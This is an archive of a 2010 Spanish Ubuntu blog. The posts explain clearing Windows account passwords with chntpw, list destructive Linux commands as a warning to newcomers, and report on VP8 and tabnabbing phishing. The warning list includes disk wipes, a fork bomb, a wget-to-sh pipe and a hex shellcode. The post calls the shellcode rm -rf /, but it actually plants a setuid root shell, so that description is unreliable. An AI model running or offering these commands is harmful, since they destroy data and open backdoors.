miércoles, 11 de agosto de 2010

RECUPERA UNA CONTRASEÑA DE WINDOWS CON UBUNTU

Recuperar una contraseña de windows utilizando Ubuntu y programa llamado chntpw.
NOTA: Si deseas usar este método y no tienes instalado Ubuntu, puedes utilizar una versión “live CD” de Ubuntu y desde allí usar chntpw.
Chntpw (acrónimo de Change NT Password) es un programa que nos permite quitar o modificar las contraseñas de usuario de los sistemas Windows NT, 2k, XP, Vista y Win7 accediendo al sistema de ficheros desde un sistema Linux.
Vamos a instalarlo:
  1. Abrimos una Terminal (Aplicaciones->Accesorios->Terminal).
  2. Instalamos el paquete del programa:


    sudo apt-get install chntpw
Ahora para usarlo haremos lo siguiente:
  1. A través de la Terminal navegamos hasta la carpeta donde se almacena el fichero con las contraseñas (en casi todos los Windows es “C:/WINDOWS/system32/config”). Para ello, en Ubuntu, haremos:
    NOTA: Debemos asegurarnos antes de que la partición está montada (por ejemplo accediendo a ella desde Nautilus).

    cd /media/NOMBRE-DE-LA-PARTICION/WINDOWS/system32/config
    Donde NOMBRE-DE-LA-PARTICION es el nombre de la partición donde se encuentra instalado el Windows.
  2. Ahora crackeamos el fichero que almacena la contraseñas (normalmente se llama SAM) de la siguiente manera:


    • Si queremos quitar o modificar la contraseña al usuario administrador:


      chntpw SAM
    • Si queremos quitar o modificar la contraseña a cualquier usuario en concreto:


      chntpw -u USUARIO SAM
      Donde USUARIO es el nombre del usuario cuya contraseña deseamos liberar.
  3. Tras ejecutar el comando de crackeo nos aparecerá un menú con 5 opciones. Si queremos borrar la contraseña elegimos la opción 1 y damos a [ENTER]. Si queremos modificar la contraseña elegiremos la opción 2 y damos a [ENTER].
Espero que el programa se a de utilidad

miércoles, 23 de junio de 2010

Mozilla, Opera y Flock ya soportan VP8

El codec abierto que google libero hace unas pocas semanas se está convirtiéndose en todo un éxito entre los navegadores, que ya dan soporte a este formato en sus últimas versiones, preparándose para la avalancha de contenidos en este formato que los grandes del vídeo en Internet están preparando.

Como indican en Linux Journal, Mozilla ya lanzó Firefox 3.7 alfa 5 el pasado 14 de junio, y se daba soporte a WebM/VP8 además de incluir un nuevo gestor de complementos y soporte mejorado para el estándar HTML5. Incluso han comenzado a dar soporte preliminar a la aceleración de contenidos de vídeo a través de la GPU, una característica que se irá puliendo en el futuro.
Por su parte Opera 10.6 beta  se lanzó el pasado 16 de junio y además de mejorar en su renderizado de contenidos JavaScript se ofreció soporte tanto para WebM como para VP8 en el código HTML5 que Opera es capaz de soportar.
El último en discordia,Flock 3.0 beta, fue lanzado el pasado 16 de junio y en este caso el soporte a WebM/VP8 se ofreció por un cambio esencial en la base del navegador. Mientras que antes estaba basado en Firefox, ahora el pilar fundamental del navegador social por excelencia es Chromium, y dado que este proyecto lleva soportando WebM/VP8 desde el pasado 20 de mayo en sus compilaciones de desarrollo es lógico que se haya convertido en la referencia en este tema.
Ahora solo queda por ver si los contenidos comienzan realmente a llegar, algo que Google ya está planeando hacer en YouTube y que seguramente otros también proyecten en el futuro próximo.

lunes, 21 de junio de 2010

VINUX, El linux para ciegos y discapacitados visuales

Es una distribución de Linux basada en Ubuntu 10.04 y de reciente creación (la versión final fue liberada hace menos de un mes) especialmente diseñada para usuarios con discapacidad visual. Los desarrolladores se han esforzado en mejorar la accesibilidad del sistema operativo para personas con problemas visuales que van desde herramientas para convertir el texto en voz (al estilo JAWS), lupas dinámicas para visualizar mejor el contenido de la pantalla, o soporte para teclados braille USB. Hay disponibles versiones Live en DVD, CD y USB, basadas tanto en Intrepid Ibex (la anterior versión LTS de Ubuntu) como de Lucid Lynx. Además hay versiones para arquitecturas de 32 y 64 bits disponibles para su descarga      http://vinux.org.uk/downloads.html

miércoles, 9 de junio de 2010

CAMBIO DE IMAGEN EN GOOGLE

Hola a todos cual es mi grata sorpesa al llegar a casa , que ya podemos cambiar el fondo de nuestro buscador a nuestra manera para alegrarnos mas la vista aqui os dejo la prueba

jueves, 3 de junio de 2010

INSTALAR JDOWNLOADER



Jdownloader, es un gestor que automatiza las descargas en servidores de almacenamiento.

Y aqui os pongo la manera tan sencilla  de instalarlo en nuestro ubuntu.

Abrimos consola y tecleamos 
sudo add-apt-repository ppa:jd-team/jdownloader
sudo aptitude update
sudo aptitude -y install jdownloader
 
y listo a disfrutar de jdownloader 

martes, 1 de junio de 2010

7 COMANDOS CON MALAS INTENCIONES

Hoy ando de buen humor asi que voy a poner estos 7 comandos que cada cual los use como quiera espero no tener que explicarle yo que no se usan con maldad

Si eres nuevo en Linux, es probable que en algún momento te encuentres, en algún foro o una sala de chat, con una persona malintencionada y/o poco inteligente que pretenda jugarte una mala pasada para que utilices comandos que puedan dañar tus archivos o incluso arruinar todo tu sistema operativo. Para evitar que se te presente este peligroso escenario, he aquí una lista de comandos mortales en Linux que hay que evitar.



Código:
rm -rf /
Este comando eliminará a la fuerza y recursivamente (incluyendo subdirectorios), todos los archivos dentro del directorio raiz.

Código:
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";
Esta es la versión hexadecimal de rm -Rf /, con la cual podria engañarse incluso a usuarios linux mas experimentados.

Código:
# mkfs.ext3 /dev/sda
Reformatea la partición/disco, liquidando todos los archivos del dispositivo mencionado despues del comando mkfs.

Código:
:(){:|:&};:
La ya conocida por muchos Bomba fork (http://www.kriptopolis.org/bombas-y-bombos). Este comando hará que tu sistema ejecute un elevado número de procesos, hasta que el mismo se “cuelgue”. A menudo esto puede acarrear perdida de datos.

Código:
[cualquier_comando] > /dev/sda
Con este comando, se envian bloques de datos al dispositivo indicado, lo cual a menudo puede colapsar el sistema de archivos, dando como resultado una perdida total de datos.

Código:
wget http://[fuente_de_origen_inseguro] -O- | sh
Estamos descargando datos, posiblemente un script, de alguna fuente no muy confiable, e inmediatamente despues, estamos ordenando que se ejecute el archivo descargado. NUNCA HAGAS ESTO.

Código:
mv /home/tudirectoriodeusuario/* /dev/null
Este comando mueve todos los archivos dentro de tu directorio home, a un lugar que no existe, razón por la cual, nunca podras ver tus archivos de nuevo.

lunes, 31 de mayo de 2010

Mozilla nos previenen de un nueva forma de phishing: El tabnabbing

Aza Raskin, un desarrollador de Mozilla, ha publicado un interesante artículo donde nos previene de una nueva posible forma de phishing o ingeniería social: El tabnabbing.
La idea de esta estafa cibernética es muy simple: Mientras el usuario explora la red abriendo múltiples pestañas en su navegador, una página maliciosa cambia su contenido mientras el usuario no está mirando. Para entenderlo bien, nada mejor que ver el siguiente vídeo.



A New Type of Phishing Attack from Aza Raskin on Vimeo.


Cuando el usuario no está visualizando la pestaña que contiene la web maliciosa, esta última aprovecha para cambiar su aspecto. En este ejemplo, cuando el usuario regresa a dicha pestaña, la página maliciosa tiene una apariencia similar a Gmail, lo que podría hacernos pensar que la sesión ha terminado por falta de actividad e inducir a más de uno de nosotros a introducir nuestro nombre de usuario y contraseña.
Fijaros que, aunque el aspecto de la página ha cambiado, la URL sigue siendo la misma, por lo que el engaño solo tendría éxito con usuarios de nivel limitado o si nos despistamos.
Este tipo de técnicas se pueden aplicar a diferentes tipos de web y su objetivo es el robo de contraseñas, datos bancarios, etc. Según Raskin, la mejor manera de evitar estos ataques sería cambiar a la autenticación basada en el navegador, que evitaría estas confusiones con URL falsas.
Ya sé que este tipo de entradas se desvía un poco de la temática habitual de Noticias Ubuntu, pero puesto que todos utilizamos navegadores con pestañas, me ha parecido oportuno compartirla.
En cualquier caso, es de agradecer que existan desarrolladores como Aza Raskin, los cuales se devanan los sesos para llamar nuestra atención sobre este tipo de cuestiones, incluso mucho antes de que a cualquier cracker del mundo se le haya ocurrido empezar a explotarlas.
De momento, esta técnica solamente funciona en Firefox y  Google Chrome.